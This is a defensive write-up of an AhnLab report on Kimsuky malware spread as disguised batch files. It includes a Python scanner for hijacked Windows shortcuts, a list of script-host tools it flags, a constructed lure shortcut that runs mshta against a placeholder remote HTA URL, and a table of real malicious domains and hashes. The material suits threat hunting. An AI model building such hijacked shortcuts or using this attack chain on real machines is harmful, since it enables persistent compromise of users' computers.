Malicious batch files (*.bat) disguised as document viewers being distributed (Kimsuky)

2023-06-30 Ahnlab Distributing malicious batch files (*.bat) disguised as document viewers (Kimsuky)

https://asec.ahnlab.com/ko/54952/


AhnLab reports that malware assessed as Kimsuky activity was distributed as batch files (*.bat) disguised as document viewers, most likely by email, together with decoy Google Drive/Docs documents on military and Korean unification topics. The BAT file used WMIC to enumerate installed security products and fetched a different follow-on script from joongang[.]site depending on whether a Kaspersky, Avast, AhnLab V3, or other product's process was found. Follow-on components replaced Word's Normal.dotm template, established persistence for a VBS script through the registry, the Startup folder, or a scheduled task, and modified browser and email client shortcuts so that launching them ran attacker-controlled commands such as mshta. The scripts also collected host details, including battery and process information, and sent them to joongang[.]site. AhnLab published the related BAT/VBS detection names and representative infrastructure, including joongang[.]site and namsouth[.]com.
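The shortcut modification is the part of this chain that survives a reboot without touching the usual autorun locations, and a hijacked shortcut keeps its original icon, so it is not visible from the desktop. The following is an added example, not code from the AhnLab report, that parses the StringData section of a Windows shortcut (.lnk, MS-SHLLINK layout) and flags shortcuts whose target or arguments invoke a script host such as mshta. The report does not give the exact contents of the modified shortcuts; the paths, the chrome.exe icon location and the example.invalid HTA URL below are constructed placeholders, and build_lnk exists only to produce test input.

```python
"""Inspect Windows shortcut (.lnk) files for script-host hijacking.

Added example, not code from the AhnLab report. Layout per MS-SHLLINK:
76-byte ShellLinkHeader, optional LinkTargetIDList and LinkInfo, then the
StringData fields. All sample paths/URLs here are constructed placeholders.
"""
import struct
import uuid
from pathlib import Path

HEADER_SIZE = 0x4C
LNK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046").bytes_le

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields appear in this fixed order when their flag is set.
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))

# Script hosts / LOLBins a browser or mail-client shortcut should never launch.
SCRIPT_HOSTS = ("mshta", "wscript", "cscript", "powershell", "rundll32", "regsvr32")


def _string_data(s: str) -> bytes:
    """CountCharacters (uint16) followed by UTF-16LE text, no terminator."""
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_lnk(relative_path: str, arguments: str = "", icon_location: str = "") -> bytes:
    """Build a minimal Unicode .lnk carrying only StringData (test input only)."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH
    if arguments:
        flags |= HAS_ARGUMENTS
    if icon_location:
        flags |= HAS_ICON_LOCATION
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 FILETIMEs, FileSize,
    # IconIndex, ShowCommand (SW_SHOWNORMAL = 1), HotKey, Reserved1..3.
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = _string_data(relative_path)
    if arguments:
        body += _string_data(arguments)
    if icon_location:
        body += _string_data(icon_location)
    return header + body + struct.pack("<I", 0)  # TerminalBlock closes ExtraData


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link, skipping IDList and LinkInfo."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:       # IDListSize (uint16) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                 # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        nbytes = count * 2 if unicode else count
        fields[name] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "cp1252", "replace")
        pos += nbytes
    return fields


def script_hosts_in(fields: dict) -> list:
    """Script hosts named in the shortcut target path or its arguments."""
    probe = " ".join(fields.get(k, "") for k in ("relative_path", "arguments")).lower()
    return [h for h in SCRIPT_HOSTS if h in probe]


def scan_shortcuts(directory) -> dict:
    """Map every .lnk under `directory` that launches a script host to the hosts found."""
    hits = {}
    for lnk in Path(directory).rglob("*.lnk"):
        try:
            hosts = script_hosts_in(parse_lnk(lnk.read_bytes()))
        except (ValueError, struct.error):
            continue
        if hosts:
            hits[str(lnk)] = hosts
    return hits


if __name__ == "__main__":
    # Constructed lure: Chrome icon, but the target is mshta with a remote HTA.
    lure = build_lnk(r"..\..\Windows\System32\mshta.exe",
                     "http://example.invalid/update.hta",
                     r"C:\Program Files\Google\Chrome\Application\chrome.exe")
    print(script_hosts_in(parse_lnk(lure)))  # ['mshta']
```

Run scan_shortcuts over the Desktop, Quick Launch and Start Menu folders of each profile to hunt for this technique. The parser deliberately skips the LinkInfo block, so a shortcut whose target is expressed only through LinkInfo's local base path (no RELATIVE_PATH string) will not be inspected; a production hunt should also parse that block, and should treat any shortcut whose icon points at a browser or mail client while its target is a script host as the strongest signal.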

Indicators of Compromise

Type     Value                              First Seen   Last Seen
DOMAIN   namsouth.com                       2023-06-30   2024-02-28
HASH     8536d838dcdd026c57187ec2c3aec0f6   2023-06-30   2023-07-10
HASH     00119ed01689e76cb7f33646693ecd6a   2023-06-30   2023-07-10
HASH     7d79901b01075e29d8505e72d225ff52   2023-06-30   2023-07-10
HASH     a7ac7d100184078c2aa5645552794c19   2023-06-30   2023-07-10
URL      http://joongang.site/pprb/sec/c…   2023-06-30   2023-07-10
URL      http://joongang.site/pprb/sec/c…   2023-06-30   2023-07-10
URL      http://namsouth.com/gopprb/OpOp…   2023-06-30   2023-07-10
URL      http://joongang.site/docx/         2023-06-30   2023-07-10
URL      https://joongang.site/pprb/sec/…   2023-06-30   2023-07-10
URL      http://joongang.site/pprb/sec/c…   2023-06-30   2023-07-10
URL      http://joongang.site/pprb/sec/     2023-06-30   2023-07-10
URL      http://joongang.site/pprb/sec/d…   2023-06-30   2023-07-10
URL      https://joongang.site/pprb/sec/…   2023-06-30   2023-07-10
URL      http://joongang.site/doc/          2023-06-30   2023-07-10
URL      https://joongang.site/pprb/sec/…   2023-06-30   2023-07-10
URL      http://staradvertiser.store/sig…   2023-06-30   2023-07-10
URL      https://joongang.site/pprb/sec/…   2023-06-30   2023-07-10
URL      https://joongang.site/pprb/sec/…   2023-06-30   2023-07-10
DOMAIN   staradvertiser.store               2023-06-30   2023-07-10
DOMAIN   joongang.site                      2023-06-30   2023-07-10

The HASH values are 32 hex characters, i.e. MD5 digests. URLs ending in "…" are truncated as listed on the page.
